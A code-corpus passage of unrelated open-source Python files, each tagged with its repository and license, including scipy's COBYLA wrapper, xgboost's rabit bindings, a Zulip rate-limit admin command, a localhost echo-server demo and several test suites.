        # Reuse an existing wx.App (e.g. when running inside a console with
        # GUI event-loop integration); otherwise create our own.
        app = wx.GetApp()
        if app is None:
            app = MyApp(redirect=False, clearSigInt=False)
        else:
            frame = MyFrame(None, "Simple wxPython App")
            app.SetTopWindow(frame)
            print("Print statements go to this stdout window by default.")
            frame.Show(True)
| roscoeZA/GeoGigSync | pydev/tests_mainloop/gui-wx.py | Python | cc0-1.0 | 3,445 |
from django.core.management.base import NoArgsCommand
from django.conf import settings
from avatar.models import Avatar
from avatar.models import AUTO_GENERATE_AVATAR_SIZES
class Command(NoArgsCommand):
    """Management command that re-creates every avatar's thumbnails for all
    sizes in settings.AUTO_GENERATE_AVATAR_SIZES.

    (Python 2 / old Django code: NoArgsCommand and print-statement syntax.)
    """
    help = "Regenerates avatar thumbnails for the sizes specified in " + \
           "settings.AUTO_GENERATE_AVATAR_SIZES."
    def handle_noargs(self, **options):
        # Walk every avatar and rebuild each configured thumbnail size.
        for avatar in Avatar.objects.all():
            for size in AUTO_GENERATE_AVATAR_SIZES:
                print "Rebuilding Avatar id=%s at size %s." % (avatar.id, size)
                avatar.create_thumbnail(size)
| amarandon/smeuhsocial | apps/avatar/management/commands/rebuild_avatars.py | Python | mit | 594 |
"""
Interface to Constrained Optimization By Linear Approximation
Functions
---------
.. autosummary::
:toctree: generated/
fmin_cobyla
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.lib.six import callable
from scipy.optimize import _cobyla
from .optimize import Result, _check_unknown_options
from warnings import warn
__all__ = ['fmin_cobyla']
def fmin_cobyla(func, x0, cons, args=(), consargs=None, rhobeg=1.0, rhoend=1e-4,
                iprint=1, maxfun=1000, disp=None):
    """
    Minimize a function using the Constrained Optimization BY Linear
    Approximation (COBYLA) method. This method wraps a FORTRAN
    implentation of the algorithm.

    Parameters
    ----------
    func : callable
        Function to minimize. In the form func(x, \\*args).
    x0 : ndarray
        Initial guess.
    cons : sequence
        Constraint functions; must all be ``>=0`` (a single function
        if only 1 constraint). Each function takes the parameters `x`
        as its first argument.
    args : tuple
        Extra arguments to pass to function.
    consargs : tuple
        Extra arguments to pass to constraint functions (default of None means
        use same extra arguments as those passed to func).
        Use ``()`` for no extra arguments.
    rhobeg :
        Reasonable initial changes to the variables.
    rhoend :
        Final accuracy in the optimization (not precisely guaranteed). This
        is a lower bound on the size of the trust region.
    iprint : {0, 1, 2, 3}
        Controls the frequency of output; 0 implies no output. Deprecated.
    disp : {0, 1, 2, 3}
        Over-rides the iprint interface. Preferred.
    maxfun : int
        Maximum number of function evaluations.

    Returns
    -------
    x : ndarray
        The argument that minimises `f`.

    See also
    --------
    minimize: Interface to minimization algorithms for multivariate
        functions. See the 'COBYLA' `method` in particular.

    Notes
    -----
    This algorithm is based on linear approximations to the objective
    function and each constraint. We briefly describe the algorithm.

    Suppose the function is being minimized over k variables. At the
    jth iteration the algorithm has k+1 points v_1, ..., v_(k+1),
    an approximate solution x_j, and a radius RHO_j.
    (i.e. linear plus a constant) approximations to the objective
    function and constraint functions such that their function values
    agree with the linear approximation on the k+1 points v_1,.., v_(k+1).
    This gives a linear program to solve (where the linear approximations
    of the constraint functions are constrained to be non-negative).

    However the linear approximations are likely only good
    approximations near the current simplex, so the linear program is
    given the further requirement that the solution, which
    will become x_(j+1), must be within RHO_j from x_j. RHO_j only
    decreases, never increases. The initial RHO_j is rhobeg and the
    final RHO_j is rhoend. In this way COBYLA's iterations behave
    like a trust region algorithm.

    Additionally, the linear program may be inconsistent, or the
    approximation may give poor improvement. For details about
    how these issues are resolved, as well as how the points v_i are
    updated, refer to the source code or the references below.

    References
    ----------
    Powell M.J.D. (1994), "A direct search optimization method that models
    the objective and constraint functions by linear interpolation.", in
    Advances in Optimization and Numerical Analysis, eds. S. Gomez and
    J-P Hennart, Kluwer Academic (Dordrecht), pp. 51-67

    Powell M.J.D. (1998), "Direct search algorithms for optimization
    calculations", Acta Numerica 7, 287-336

    Powell M.J.D. (2007), "A view of algorithms for optimization without
    derivatives", Cambridge University Technical Report DAMTP 2007/NA03

    Examples
    --------
    Minimize the objective function f(x,y) = x*y subject
    to the constraints x**2 + y**2 < 1 and y > 0::

        >>> def objective(x):
        ...     return x[0]*x[1]
        ...
        >>> def constr1(x):
        ...     return 1 - (x[0]**2 + x[1]**2)
        ...
        >>> def constr2(x):
        ...     return x[1]
        ...
        >>> fmin_cobyla(objective, [0.0, 0.1], [constr1, constr2], rhoend=1e-7)
           Normal return from subroutine COBYLA
        NFVALS =   64   F =-5.000000E-01    MAXCV = 1.998401E-14
        X =-7.071069E-01   7.071067E-01
        array([-0.70710685,  0.70710671])

    The exact solution is (-sqrt(2)/2, sqrt(2)/2).

    """
    # Normalise `cons` into a list of callables; a single callable is
    # accepted for the one-constraint case.
    err = "cons must be a sequence of callable functions or a single"\
          " callable function."
    try:
        m = len(cons)
    except TypeError:
        if callable(cons):
            m = 1
            cons = [cons]
        else:
            raise TypeError(err)
    else:
        for thisfunc in cons:
            if not callable(thisfunc):
                raise TypeError(err)
    if consargs is None:
        consargs = args
    # build constraints in the dict format used by `minimize`
    con = tuple({'type': 'ineq', 'fun': c, 'args': consargs} for c in cons)
    # options: `disp`, when given, overrides the deprecated `iprint`
    if disp is not None:
        iprint = disp
    opts = {'rhobeg': rhobeg,
            'tol': rhoend,
            'iprint': iprint,
            'disp' : iprint != 0,
            'maxiter': maxfun}
    return _minimize_cobyla(func, x0, args, constraints=con,
                            **opts)['x']
def _minimize_cobyla(fun, x0, args=(), constraints=(),
                     rhobeg=1.0, tol=1e-4, iprint=1, maxiter=1000,
                     disp=False, **unknown_options):
    """
    Minimize a scalar function of one or more variables using the
    Constrained Optimization BY Linear Approximation (COBYLA) algorithm.

    Options for the COBYLA algorithm are:
        rhobeg : float
            Reasonable initial changes to the variables.
        tol : float
            Final accuracy in the optimization (not precisely guaranteed).
            This is a lower bound on the size of the trust region.
        disp : bool
            Set to True to print convergence messages. If False,
            `verbosity` is ignored as set to 0.
        maxiter : int
            Maximum number of function evaluations.

    This function is called by the `minimize` function with
    `method=COBYLA`. It is not supposed to be called directly.
    """
    _check_unknown_options(unknown_options)
    maxfun = maxiter
    rhoend = tol
    if not disp:
        iprint = 0
    # check constraints: accept a single dict and validate each entry
    if isinstance(constraints, dict):
        constraints = (constraints, )
    for ic, con in enumerate(constraints):
        # check type (only inequality constraints are supported)
        try:
            ctype = con['type'].lower()
        except KeyError:
            raise KeyError('Constraint %d has no type defined.' % ic)
        except TypeError:
            raise TypeError('Constraints must be defined using a '
                            'dictionary.')
        except AttributeError:
            raise TypeError("Constraint's type must be a string.")
        else:
            if ctype != 'ineq':
                raise ValueError("Constraints of type '%s' not handled by "
                                 "COBYLA." % con['type'])
        # check function
        if 'fun' not in con:
            raise KeyError('Constraint %d has no function defined.' % ic)
        # check extra arguments
        if 'args' not in con:
            con['args'] = ()
    m = len(constraints)
    def calcfc(x, con):
        # Callback passed to the Fortran routine: evaluates the objective
        # and fills `con` with the constraint values at x.
        f = fun(x, *args)
        for k, c in enumerate(constraints):
            con[k] = c['fun'](x, *c['args'])
        return f
    # `info` is filled in-place by the Fortran code:
    # [status, nfev, final f, max constraint violation]
    info = np.zeros(4, np.float64)
    xopt, info = _cobyla.minimize(calcfc, m=m, x=np.copy(x0), rhobeg=rhobeg,
                                  rhoend=rhoend, iprint=iprint, maxfun=maxfun,
                                  dinfo=info)
    return Result(x=xopt,
                  status=int(info[0]),
                  success=info[0]==1,
                  message={1: 'Optimization terminated successfully.',
                           2: 'Maximum number of function evaluations has '
                              'been exceeded.',
                           3: 'Rounding errors are becoming damaging in '
                              'COBYLA subroutine.'
                           }.get(info[0], 'Unknown exit status.'),
                  nfev=int(info[1]),
                  fun=info[2],
                  maxcv=info[3])
if __name__ == '__main__':
    from math import sqrt

    # Smoke test: minimize x*y on the closed unit disc.  The optimum is at
    # (+-1/sqrt(2), -+1/sqrt(2)) with objective value -1/2.
    def fun(x):
        return x[0] * x[1]

    def cons(x):
        # >= 0 inside the unit disc
        return 1 - x[0]**2 - x[1]**2

    x = fmin_cobyla(fun, [1., 1.], cons, iprint = 3, disp = 1)
    print('\nTheoretical solution: %e, %e' % (1. / sqrt(2.), -1. / sqrt(2.)))
| Universal-Model-Converter/UMC3.0a | data/Python/x86/Lib/site-packages/scipy/optimize/cobyla.py | Python | mit | 8,871 |
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferUI
import GafferScene
# Register user-visible descriptions for the Transform node and its plugs.
Gaffer.Metadata.registerNodeDescription(
GafferScene.Transform,
"""Modifies the transforms of all locations matched by the filter.""",
"space",
"""The space in which the transform is applied.""",
"transform",
"""The transform to be applied.""",
)
# Present the "space" plug as an enum widget with the two supported spaces.
GafferUI.PlugValueWidget.registerCreator(
GafferScene.Transform,
"space",
GafferUI.EnumPlugValueWidget,
labelsAndValues = (
( "World", GafferScene.Transform.Space.World ),
( "Object", GafferScene.Transform.Space.Object ),
)
)
| goddardl/gaffer | python/GafferSceneUI/TransformUI.py | Python | bsd-3-clause | 2,347 |
"""Tests for the management commands `send_message_digest`."""
from django.core import mail
from django.core.management import call_command
from django.test import TestCase
from django.utils.timezone import now, timedelta
from mixer.backend.django import mixer
class SendMessageDigestTestCase(TestCase):
    """Tests for the `send_message_digest` management command."""
    longMessage = True
    def test_validates_and_saves_input(self):
        # NOTE(review): method name looks like a misnomer — the assertions
        # below verify digest *sending* behaviour, not input validation.
        two_days_ago = now() - timedelta(days=2)
        user = mixer.blend('auth.User')
        conversation = mixer.blend('conversation.Conversation')
        conversation.users.add(user)
        conversation.unread_by.add(user)
        # Freshly-unread conversation: no digest should go out yet.
        call_command('send_message_digest')
        self.assertEqual(len(mail.outbox), 0, msg=(
            'No digest should have been sent.'))
        # Once the conversation has been unread long enough, a digest is due.
        conversation.read_by_all = two_days_ago
        conversation.save()
        call_command('send_message_digest')
        self.assertEqual(len(mail.outbox), 1, msg=(
            'One digest should have been sent.'))
        # The feature can be switched off via settings.
        with self.settings(CONVERSATION_ENABLE_DIGEST=False):
            call_command('send_message_digest')
        self.assertEqual(len(mail.outbox), 1, msg=(
            'No new digest should have been sent.'))
| bitmazk/django-conversation | conversation/tests/management_tests.py | Python | mit | 1,199 |
# Copyright (c) 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import os, multiprocessing
import time
import bottle
import requests
import pytest
from pytest import raises
from jenkinsflow import jenkins_api
from .cfg import ApiType
from .framework import api_select
from .framework.utils import assert_lines_in
here = os.path.abspath(os.path.dirname(__file__))
@bottle.route('/')
def _index():
    # Serve a canned HTML page at the root URL. The fake server deliberately
    # omits the X-Jenkins/X-Hudson headers a real CI server would send.
    return bottle.static_file('which_ci_server.html', root=here)
@bottle.route('/api/json')
def _api():
    # Mimic Jenkins' JSON API endpoint path, but return plain HTML so the
    # client's server-type detection fails as expected.
    return bottle.static_file('which_ci_server.html', root=here)
_host = 'localhost'  # interface the fake server binds to
_port = 8082  # fixed port; the test polls this until the server is up
def _server():
    # Blocks serving requests forever; the test runs this in a child process.
    bottle.run(host=_host, port=_port, debug=True)
@pytest.mark.apis(ApiType.JENKINS)
def test_which_ci_server_not_ci(api_type):
    """Polling a non-CI HTTP server must raise a descriptive error."""
    proc = None
    try:
        with api_select.api(__file__, api_type) as api:
            proc = multiprocessing.Process(target=_server)
            proc.start()
            with raises(Exception) as exinfo:
                # Retry while the bottle server is still starting; only
                # ConnectionError is retried - the expected "not a CI server"
                # exception escapes the loop and is captured by `raises`.
                for _ in range(0, 10):
                    ex = None
                    try:
                        jenkins_api.Jenkins("http://" + _host + ':' + repr(_port), "dummy").poll()
                    except requests.exceptions.ConnectionError as ex:
                        # Wait for bottle to start
                        print(ex)
                        time.sleep(0.1)
            assert_lines_in(
                api_type, str(exinfo.value),
                "Not connected to Jenkins or Hudson (expected X-Jenkins or X-Hudson header, got: "
            )
    finally:
        # Always kill the child web server, even when assertions fail.
        if proc:
            proc.terminate()
| lechat/jenkinsflow | test/which_ci_server_test.py | Python | bsd-3-clause | 1,672 |
import os
import socket
import threading
import socketserver
SERVER_HOST = 'localhost'  # loopback only; this demo never serves externally
SERVER_PORT = 0 # Tells kernel to pick port randomly
BUF_SIZE = 1024  # maximum bytes read per recv() call
ECHO_MSG = b'Hello echo Server!'  # payload each client sends to the server
class ForkedClient():
    """Small TCP client used to exercise the forking echo server."""

    def __init__(self, ip, port):
        # Connect to the server immediately on construction.
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((ip, port))

    def run(self):
        """Send the canned payload and print the server's reply."""
        pid = os.getpid()
        print(f'PID {pid}. Sending message: {ECHO_MSG}')
        sent = self.socket.send(ECHO_MSG)
        print(f"Sent: {sent} characters")
        # A single recv() suffices: the reply is far smaller than BUF_SIZE.
        reply = self.socket.recv(BUF_SIZE)
        print(f"PID {pid} recieved {reply}")  # sic: original output wording kept

    def shutdown(self):
        """Close the client socket."""
        self.socket.close()
class ForkingServerRequestHandler(socketserver.BaseRequestHandler):
    """Echoes each request back, prefixed with the handling process's PID."""

    def handle(self):
        payload = self.request.recv(BUF_SIZE)
        # Prefix the echo with our PID so clients can see which fork served them.
        reply = bytes("%s: %s" % (os.getpid(), payload), 'utf-8')
        print("Server sending response [pid: data]: %s" % reply)
        self.request.send(reply)
        return
class ForkingServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    """TCP server that forks one child process per connection.

    All behaviour is inherited from the two socketserver base classes;
    nothing needs to be overridden here.
    """
    pass
def main():
    """Start the forking echo server, run two clients against it, clean up."""
    # Launch the server on an OS-assigned free port (SERVER_PORT == 0).
    server = ForkingServer((SERVER_HOST, SERVER_PORT), ForkingServerRequestHandler)
    ip, port = server.server_address  # Getting the actual bound port number
    server_thread = threading.Thread(target=server.serve_forever)
    # BUG FIX: Thread.setDaemon() is deprecated (removed-in-future API);
    # set the daemon attribute instead so a hung serve_forever() cannot
    # keep the process alive.
    server_thread.daemon = True
    server_thread.start()
    print('Server loop running PID: %s' % os.getpid())

    # Run two clients sequentially; each is served by its own forked child.
    client1 = ForkedClient(ip, port)
    client1.run()
    client2 = ForkedClient(ip, port)
    client2.run()

    # Clean them up: stop the serve_forever loop, close sockets.
    server.shutdown()
    client1.shutdown()
    client2.shutdown()
    server.socket.close()

if __name__ == '__main__':
    main()
| GreenJoey/My-Simple-Programs | python/Network Programming/echo_server.py | Python | gpl-2.0 | 1,974 |
from argparse import ArgumentParser
from typing import Any
from zerver.lib.management import CommandError, ZulipBaseCommand
from zerver.lib.rate_limiter import RateLimitedUser
from zerver.models import UserProfile, get_user_profile_by_api_key
class Command(ZulipBaseCommand):
    help = """Manually block or unblock a user from accessing the API"""
    def add_arguments(self, parser: ArgumentParser) -> None:
        """Declare the CLI flags and positional operation for this command."""
        parser.add_argument('-e', '--email',
                            dest='email',
                            help="Email account of user.")
        parser.add_argument('-a', '--api-key',
                            dest='api_key',
                            help="API key of user.")
        parser.add_argument('-s', '--seconds',
                            dest='seconds',
                            default=60,
                            type=int,
                            help="Seconds to block for.")
        parser.add_argument('-d', '--domain',
                            dest='domain',
                            default='api_by_user',
                            help="Rate-limiting domain. Defaults to 'api_by_user'.")
        parser.add_argument('-b', '--all-bots',
                            dest='bots',
                            action='store_true',
                            default=False,
                            help="Whether or not to also block all bots for this user.")
        parser.add_argument('operation', metavar='<operation>', type=str, choices=['block', 'unblock'],
                            help="operation to perform (block or unblock)")
        self.add_realm_args(parser)
    def handle(self, *args: Any, **options: Any) -> None:
        """Resolve the target user(s) and apply the block/unblock operation."""
        # Exactly one of --email / --api-key must be given (XOR check).
        if (not options['api_key'] and not options['email']) or \
                (options['api_key'] and options['email']):
            raise CommandError("Please enter either an email or API key to manage")
        realm = self.get_realm(options)
        if options['email']:
            user_profile = self.get_user(options['email'], realm)
        else:
            try:
                user_profile = get_user_profile_by_api_key(options['api_key'])
            except UserProfile.DoesNotExist:
                raise CommandError("Unable to get user profile for api key {}".format(options['api_key']))
        users = [user_profile]
        # Optionally include every bot owned by the user in the operation.
        if options['bots']:
            users.extend(bot for bot in UserProfile.objects.filter(is_bot=True,
                                                                   bot_owner=user_profile))
        operation = options['operation']
        for user in users:
            print(f"Applying operation to User ID: {user.id}: {operation}")
            if operation == 'block':
                RateLimitedUser(user, domain=options['domain']).block_access(options['seconds'])
            elif operation == 'unblock':
                RateLimitedUser(user, domain=options['domain']).unblock_access()
| brainwane/zulip | zerver/management/commands/rate_limit.py | Python | apache-2.0 | 2,937 |
"""Distributed XGBoost Rabit related API."""
import ctypes
from enum import IntEnum, unique
import pickle
from typing import Any, TypeVar, Callable, Optional, cast, List, Union
import numpy as np
from .core import _LIB, c_str, STRING_TYPES, _check_call
def _init_rabit() -> None:
    """Declare C return types for the rabit entry points (internal)."""
    if _LIB is None:
        return
    # ctypes defaults restype to c_int anyway, but declaring it explicitly
    # documents the ABI of every int-returning rabit call we use.
    for fname in ("RabitGetRank", "RabitGetWorldSize",
                  "RabitIsDistributed", "RabitVersionNumber"):
        getattr(_LIB, fname).restype = ctypes.c_int
def init(args: Optional[List[bytes]] = None) -> None:
    """Initialize the rabit library with the given argument byte strings."""
    argv = [] if args is None else args
    # Marshal the byte strings into a C char* array for RabitInit.
    c_argv = (ctypes.c_char_p * len(argv))()
    c_argv[:] = cast(List[Union[ctypes.c_char_p, bytes, None, int]], argv)
    _LIB.RabitInit(len(c_argv), c_argv)
def finalize() -> None:
    """Finalize the process, notify tracker everything is done."""
    # Must be called once at shutdown so the tracker can release the worker.
    _LIB.RabitFinalize()
def get_rank() -> int:
    """Return the 0-based rank of the current worker process."""
    return _LIB.RabitGetRank()
def get_world_size() -> int:
    """Return the total number of worker processes."""
    return _LIB.RabitGetWorldSize()
def is_distributed() -> int:
    """Return nonzero when rabit is running in distributed mode."""
    return _LIB.RabitIsDistributed()
def tracker_print(msg: Any) -> None:
    """Print *msg* on the tracker (or locally when not distributed).

    Lets workers report progress information to the central tracker.
    """
    text = msg if isinstance(msg, STRING_TYPES) else str(msg)
    if _LIB.RabitIsDistributed() != 0:
        _check_call(_LIB.RabitTrackerPrint(c_str(text)))
    else:
        # Single-process mode: there is no tracker, print locally instead.
        print(text.strip(), flush=True)
def get_processor_name() -> bytes:
    """Return the host (processor) name of this worker as bytes."""
    capacity = 256  # maximum name length the C side may write
    out_len = ctypes.c_ulong()
    name_buf = ctypes.create_string_buffer(capacity)
    _LIB.RabitGetProcessorName(name_buf, ctypes.byref(out_len), capacity)
    return name_buf.value
T = TypeVar("T")  # pylint:disable=invalid-name
def broadcast(data: T, root: int) -> T:
    """Broadcast object from one node to all other nodes.
    Parameters
    ----------
    data : any type that can be pickled
        Input data, if current rank does not equal root, this can be None
    root : int
        Rank of the node to broadcast data from.
    Returns
    -------
    object : int
        the result of broadcast.
    """
    rank = get_rank()
    length = ctypes.c_ulong()
    # Two-phase protocol: first broadcast the pickled payload's size so
    # receivers can allocate a buffer, then broadcast the payload itself.
    if root == rank:
        assert data is not None, 'need to pass in data when broadcasting'
        s = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)
        length.value = len(s)
    # run first broadcast
    _check_call(_LIB.RabitBroadcast(ctypes.byref(length),
                                    ctypes.sizeof(ctypes.c_ulong), root))
    if root != rank:
        # Receiver: allocate a raw buffer of the announced size and fill it.
        dptr = (ctypes.c_char * length.value)()
        # run second
        _check_call(_LIB.RabitBroadcast(ctypes.cast(dptr, ctypes.c_void_p),
                                        length.value, root))
        data = pickle.loads(dptr.raw)
        del dptr
    else:
        # Sender: ship the pickled bytes directly.
        _check_call(_LIB.RabitBroadcast(ctypes.cast(ctypes.c_char_p(s), ctypes.c_void_p),
                                        length.value, root))
        del s
    return data
# enumeration of dtypes
# Maps numpy dtypes to the integer type codes expected by the rabit C API;
# the order/values must stay in sync with the engine's dtype enumeration.
DTYPE_ENUM__ = {
    np.dtype('int8'): 0,
    np.dtype('uint8'): 1,
    np.dtype('int32'): 2,
    np.dtype('uint32'): 3,
    np.dtype('int64'): 4,
    np.dtype('uint64'): 5,
    np.dtype('float32'): 6,
    np.dtype('float64'): 7
}
@unique
class Op(IntEnum):
    """Reduction operators accepted by :func:`allreduce`.

    The numeric values mirror the C engine's operator enumeration and must
    not be changed.
    """
    MAX = 0  # element-wise maximum
    MIN = 1  # element-wise minimum
    SUM = 2  # element-wise sum
    OR = 3   # bitwise or
def allreduce(  # pylint:disable=invalid-name
    data: np.ndarray, op: Op, prepare_fun: Optional[Callable[[np.ndarray], None]] = None
) -> np.ndarray:
    """Perform allreduce, return the result.
    Parameters
    ----------
    data :
        Input data.
    op :
        Reduction operators, can be MIN, MAX, SUM, BITOR
    prepare_fun :
        Lazy preprocessing function, if it is not None, prepare_fun(data)
        will be called by the function before performing allreduce, to initialize the data
        If the result of Allreduce can be recovered directly,
        then prepare_fun will NOT be called
    Returns
    -------
    result :
        The result of allreduce, have same shape as data
    Notes
    -----
    This function is not thread-safe.
    """
    if not isinstance(data, np.ndarray):
        raise Exception('allreduce only takes in numpy.ndarray')
    buf = data.ravel()
    # NOTE(review): this copies only when the raveled view shares a base with
    # the input; when `data` owns its memory, `buf` is a view into `data` and
    # the in-place reduction below mutates the caller's array - confirm this
    # aliasing behaviour is intended.
    if buf.base is data.base:
        buf = buf.copy()
    if buf.dtype not in DTYPE_ENUM__:
        raise Exception(f"data type {buf.dtype} not supported")
    if prepare_fun is None:
        # Reduction happens in place inside `buf` via the C library.
        _check_call(_LIB.RabitAllreduce(buf.ctypes.data_as(ctypes.c_void_p),
                                        buf.size, DTYPE_ENUM__[buf.dtype],
                                        int(op), None, None))
    else:
        # Wrap the lazy initializer in a C callback; rabit only invokes it
        # when the result cannot be recovered from a checkpoint.
        func_ptr = ctypes.CFUNCTYPE(None, ctypes.c_void_p)
        def pfunc(_: Any) -> None:
            """prepare function."""
            fn = cast(Callable[[np.ndarray], None], prepare_fun)
            fn(data)
        _check_call(_LIB.RabitAllreduce(buf.ctypes.data_as(ctypes.c_void_p),
                                        buf.size, DTYPE_ENUM__[buf.dtype],
                                        op, func_ptr(pfunc), None))
    return buf
def version_number() -> int:
    """Return the version of the stored model (number of CheckPoint calls)."""
    return _LIB.RabitVersionNumber()
# initialization script
# Runs at import time so the C function signatures are declared before use.
_init_rabit()
| dmlc/xgboost | python-package/xgboost/rabit.py | Python | apache-2.0 | 6,139 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Get record tests."""
from __future__ import absolute_import, print_function
from flask import url_for
from helpers import get_json, record_url, to_relative_url
def test_item_get(app, test_records):
    """Test record retrieval."""
    with app.test_client() as client:
        pid, record = test_records[0]
        res = client.get(record_url(pid))
        assert res.status_code == 200
        assert res.cache_control.no_cache
        assert res.headers['ETag'] == '"{}"'.format(record.revision_id)
        # Check metadata
        data = get_json(res)
        for k in ['id', 'created', 'updated', 'metadata', 'links']:
            assert k in data
        assert data['id'] == pid.pid_value
        assert data['metadata'] == record.dumps()
        # Check self links
        # BUG FIX: the response was previously discarded (not assigned to
        # `res`), so the assertions below re-tested the original response
        # instead of the self-link response.
        res = client.get(to_relative_url(data['links']['self']))
        assert res.status_code == 200
        assert data == get_json(res)
def test_item_get_etag(app, test_records):
    """Test VALID record get request (GET .../records/<record_id>)."""
    with app.test_client() as client:
        pid, record = test_records[0]
        first = client.get(record_url(pid))
        assert first.status_code == 200
        assert first.cache_control.no_cache
        etag = first.headers['ETag']
        last_modified = first.headers['Last-Modified']
        # A conditional request with a matching ETag yields 304 Not Modified.
        res = client.get(record_url(pid), headers={'If-None-Match': etag})
        assert res.status_code == 304
        assert res.cache_control.no_cache
        # The same applies to an If-Modified-Since conditional request.
        res = client.get(
            record_url(pid), headers={'If-Modified-Since': last_modified})
        assert res.status_code == 304
        assert res.cache_control.no_cache
def test_item_get_norecord(app, test_records):
    """Test INVALID record get request (GET .../records/<record_id>)."""
    with app.test_client() as client:
        # A GET for a non-existing record id must yield a 404.
        missing_url = url_for(
            'invenio_records_rest.recid_item', pid_value='0')
        res = client.get(missing_url)
        assert res.status_code == 404
def test_item_get_invalid_mimetype(app, test_records):
    """Test invalid mimetype returns 406."""
    with app.test_client() as client:
        pid, record = test_records[0]
        # Requesting an unsupported representation must yield 406.
        res = client.get(record_url(pid), headers=[('Accept', 'video/mp4')])
        assert res.status_code == 406
| inveniosoftware/invenio-records-rest | tests/test_views_item_get.py | Python | mit | 2,695 |
import unittest
import numpy as np
from waLBerla import field, createUniformBlockGrid, AABB
class BlockforestModuleTest(unittest.TestCase):
    # These tests deliberately delete block structures while holding
    # references to their block data; the exact order of `del` statements is
    # the point of each test - do not reorder.
    def testMemoryManagement1(self):
        """Testing correct reference counting of block data"""
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
        field.addToStorage(blocks, "TestField", np.float64)
        f = blocks[0]["TestField"]
        strides_before = f.strides
        del blocks
        # create another block structure - this has triggered segfault
        # when previous blockstructure was already freed
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))  # noqa: F841
        # The first block structure must exist here, since we hold a reference to block data
        # if it would have been deleted already f.strides should lead to segfault or invalid values
        self.assertEqual(strides_before, f.strides)
    def testMemoryManagement2(self):
        """Testing correct reference counting of block data
        Holding only a numpy array pointing to a waLBerla field should still hold the blockstructure alive"""
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
        field.addToStorage(blocks, "TestField", np.float64)
        npf = field.toArray(blocks[0]["TestField"])
        npf[:, :, :] = 42.0
        del blocks
        # create another block structure - this has triggered segfault
        # when previous blockstructure was already freed
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))  # noqa: F841
        self.assertEqual(npf[0, 0, 0], 42.0)
    def testMemoryManagement3(self):
        """Same as testMemoryManagement2, but with iterators"""
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
        field.addToStorage(blocks, "TestField", np.float64)
        for block in blocks:
            for name in block.fieldNames:
                if name == "TestField":
                    f = block[name]
                    npf = field.toArray(f)
                    npf[:, :, :] = 42.0
        # Drop every name referring to the block structure except the raw
        # numpy view; the data must survive via its internal references.
        del blocks, block, name, f
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))  # noqa: F841
        self.assertEqual(npf[0, 0, 0], 42.0)
    def testExceptions(self):
        """Check that the right exceptions are thrown when nonexistent or non-convertible fields are accessed"""
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
        with self.assertRaises(ValueError) as cm:
            blocks[0]["cell bounding box"]
        self.assertEqual(str(cm.exception), "This blockdata is not accessible from Python")
        with self.assertRaises(IndexError) as cm:
            blocks[0]["nonexistent"]
        self.assertEqual(str(cm.exception), "No blockdata with the given name found")
    def testGeneralFunctionality(self):
        """Smoke-tests block structure properties and AABB arithmetic."""
        blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
        self.assertEqual(blocks.getNumberOfLevels(), 1)
        # NOTE(review): accessed without parentheses - presumably getDomain
        # is exposed as a property; confirm against the waLBerla bindings.
        aabb = blocks.getDomain
        aabb2 = AABB(1.0, 1.0, 1.0, 1.2, 1.2, 1.2)
        self.assertEqual(aabb.min, (0.0, 0.0, 0.0))
        self.assertEqual(aabb.max, (2.0, 2.0, 2.0))
        self.assertEqual(aabb.size, (2.0, 2.0, 2.0))
        self.assertEqual(aabb.empty, False)
        self.assertEqual(aabb.volume, 8.0)
        self.assertEqual(aabb.center, (1.0, 1.0, 1.0))
        self.assertEqual(aabb.contains(aabb2), True)
        self.assertEqual(aabb2.contains(aabb), False)
        self.assertEqual(aabb2.contains((1.2, 1.2, 1.2)), False)
        self.assertEqual(aabb2.contains((1.1, 1.1, 1.1)), True)
# Allow running this module directly as a test script.
if __name__ == '__main__':
    unittest.main()
